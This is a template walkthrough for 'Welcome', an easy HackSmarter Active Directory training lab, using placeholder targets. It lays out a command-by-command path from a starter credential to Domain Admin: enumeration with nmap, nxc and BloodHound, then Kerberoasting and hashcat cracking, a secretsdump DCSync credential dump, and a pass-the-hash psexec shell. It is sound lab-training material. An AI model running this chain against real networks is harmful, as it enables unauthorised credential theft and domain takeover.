su7t3 // Security Writeups

- su7t3 // Security Writeups: https://hacksmarter-writeups.pages.dev/
- Writeups: https://hacksmarter-writeups.pages.dev/writeups/
- HackSmarter Labs: https://hacksmarter-writeups.pages.dev/writeups/hack-smarter/
- HackSmarter: Welcome — Walkthrough: https://hacksmarter-writeups.pages.dev/writeups/hack-smarter/welcome/
- Docs / Notes: https://hacksmarter-writeups.pages.dev/docs/
- Active Directory Enumeration Cheat-Sheet: https://hacksmarter-writeups.pages.dev/docs/ad-enumeration-cheatsheet/


> **Lab:** Welcome  ·  **Platform:** Active Directory  ·  **Difficulty:** Easy  ·  **Provider:** HackSmarter
>
> *This is a template walkthrough — replace the placeholder values (`<TARGET_IP>`, hashes, flags) with your own findings as you work the box. Keep the structure; it mirrors how a real engagement is documented.*

## Overview

`Welcome` is the on-ramp to the HackSmarter Active Directory series. It's an **assumed-breach** scenario: you start with a low-privileged domain credential and work toward Domain Admin by chaining standard AD misconfigurations. The goal isn't a single trick — it's drilling the enumeration → foothold → privilege-escalation loop until it's muscle memory.

**Skills exercised**

- AD enumeration (BloodHound / ldapsearch / `nxc`)
- SMB and LDAP recon
- Credential abuse and lateral movement
- Mapping an attack path to Domain Admin

---

## 1. Recon

### 1.1 Initial port scan

Always start broad, then go deep on what's open.

```bash
# Full TCP scan, then service/version scan on discovered ports
nmap -p- --min-rate 2000 -oA nmap/alltcp <TARGET_IP>
nmap -p 53,88,135,139,389,445,464,593,636,3268,3269 -sCV -oA nmap/svc <TARGET_IP>
```

The classic Domain Controller fingerprint: **53 (DNS), 88 (Kerberos), 389/636 (LDAP/S), 445 (SMB), 3268 (Global Catalog)**. That tells you you're looking at a DC before you've touched a single credential.

### 1.2 Pin the domain and hostname

```bash
nxc smb <TARGET_IP>
```

```text
SMB  <TARGET_IP>  445  DC01  [*] Windows Server ... (name:DC01) (domain:welcome.hacksmarter.local)
```

Add it to your hosts file so Kerberos and tooling resolve names cleanly:

```bash
echo "<TARGET_IP> dc01.welcome.hacksmarter.local welcome.hacksmarter.local dc01" | sudo tee -a /etc/hosts
```

---

## 2. Authenticated Enumeration

You were handed a starter credential. Validate it first:

```bash
nxc smb <TARGET_IP> -u 'user' -p 'password' --shares
```

> [!TIP]
> A `[+]` from `nxc` with valid creds is your green light. If you see `STATUS_LOGON_FAILURE`, recheck the username format (`user` vs `user@domain` vs `DOMAIN\user`) and clock skew (Kerberos is picky — `sudo ntpdate <TARGET_IP>`).

### 2.1 Collect with BloodHound

Graph the domain — it's the single highest-leverage move in any AD box.

```bash
bloodhound-python -u 'user' -p 'password' -d welcome.hacksmarter.local \
  -ns <TARGET_IP> -c All --zip
```

Import the zip into BloodHound and run the pre-built queries:

- *Find Shortest Paths to Domain Admins*
- *Find Principals with DCSync Rights*
- *Shortest Path from Owned Principals*

Mark your starting user as **Owned**, then let the graph show you the path.

### 2.2 Users, shares, and quick wins

```bash
# Enumerate domain users
nxc smb <TARGET_IP> -u 'user' -p 'password' --users

# Spider readable shares for loot (configs, scripts, creds)
nxc smb <TARGET_IP> -u 'user' -p 'password' -M spider_plus
```

---

## 3. Foothold / Privilege Escalation

> Document the **specific** misconfiguration you abused here. On an easy AD lab this is usually one of:
> Kerberoasting a service account, an ACL edge (e.g. `GenericWrite`/`ForceChangePassword`), or readable credentials in a share/GPO.

Example — Kerberoasting, if BloodHound flags an SPN-bearing account:

```bash
# Request service tickets for crackable hashes
impacket-GetUserSPNs welcome.hacksmarter.local/user:password -dc-ip <TARGET_IP> -request -outputfile spns.hash

# Crack offline
hashcat -m 13100 spns.hash /usr/share/wordlists/rockyou.txt
```

Then validate the recovered credential and move along the BloodHound path:

```bash
nxc smb <TARGET_IP> -u 'svc_account' -p '<cracked_password>'
```

---

## 4. Domain Admin

Once the attack path lands on a privileged principal, dump the domain and prove it:

```bash
# DCSync if you've reached an account with replication rights
impacket-secretsdump welcome.hacksmarter.local/<priv_user>:'<password>'@<TARGET_IP>
```

```bash
# Pass-the-Hash to a SYSTEM shell on the DC
impacket-psexec -hashes :<NTLM_HASH> welcome.hacksmarter.local/administrator@<TARGET_IP>
```

```text
nt authority\system
```

### Flags

| Flag | Location | Value |
|------|----------|-------|
| User | `C:\Users\user\Desktop\user.txt` | `REDACTED` |
| Root | `C:\Users\Administrator\Desktop\root.txt` | `REDACTED` |

---

## Lessons Learned

- **BloodHound first.** On AD, the graph turns a maze into a straight line. Always mark owned principals.
- **Credential hygiene is the vuln.** Easy AD boxes almost always hinge on a reused/weak/exposed credential, not an exploit.
- **Kerberos is time-sensitive.** Sync your clock to the DC before anything Kerberos-related.

## References

- [HackSmarter Hands-On Labs](https://www.hacksmarter.org/)
- [BloodHound docs](https://bloodhound.readthedocs.io/)
- [Impacket](https://github.com/fortra/impacket)